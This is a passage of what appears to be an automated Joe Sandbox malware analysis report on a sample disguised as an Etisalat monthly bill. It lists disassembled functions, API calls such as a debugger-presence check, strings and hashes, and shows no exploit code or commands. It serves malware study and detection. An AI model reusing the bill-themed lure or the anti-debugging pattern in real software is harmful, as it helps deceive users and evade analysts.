                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Message_doexit
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 1993061046-4017498283
                                      • Opcode ID: 3c951462dfeb9b1c8f7e4394e49dbc5cd10aa68177c9694073693d977b0e0272
                                      • Instruction ID: 9d6c80f17eb1e151364c41a70da43e4ca5bb7104ea6255a27fb24b024856237d
                                      • Opcode Fuzzy Hash: 3c951462dfeb9b1c8f7e4394e49dbc5cd10aa68177c9694073693d977b0e0272
                                      • Instruction Fuzzy Hash: AFD0123228536836D21532A86C06BD676CCCB15F51F0048A5BB085A5E3CED559828299
                                      Function 00B9B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B9B564: _memset.LIBCMT ref: 00B9B571
                                        • Part of subcall function 00B80B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B9B540,?,?,?,00B6100A), ref: 00B80B89
                                      • IsDebuggerPresent.KERNEL32(?,?,?,00B6100A), ref: 00B9B544
                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B6100A), ref: 00B9B553
                                      Strings
                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B9B54E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                      • API String ID: 3158253471-631824599
                                      • Opcode ID: f720a6dae76cf5fe4230d66d8db955dd1649ca9b12bf9a17053476c0dcf3b9aa
                                      • Instruction ID: 04e7dc96811a1aeb1b13f72199f506df7afa3a1f9b358b38eb109712a7475477
                                      • Opcode Fuzzy Hash: f720a6dae76cf5fe4230d66d8db955dd1649ca9b12bf9a17053476c0dcf3b9aa
                                      • Instruction Fuzzy Hash: B0E092B0610351CFDB20EF28E518B467BE0AF14755F0189BCE456C77A1DBB4D408CB61
                                      Function 00BE5BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BE5BF5
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BE5C08
                                        • Part of subcall function 00BC54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BC555E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: d6f5d51017cc859a7984f247bea9141ada3390bc01946b3b4aca2fd5d36ebda8
                                      • Instruction ID: 579ea6c66b89148c01ae948233a9da7adc0f89d0de2507d8b2828170dfafa7f9
                                      • Opcode Fuzzy Hash: d6f5d51017cc859a7984f247bea9141ada3390bc01946b3b4aca2fd5d36ebda8
                                      • Instruction Fuzzy Hash: F2D0C931388352BBE778AB70AC4BFE76A54AB51B51F100839B645AA1D1D9E4A880C654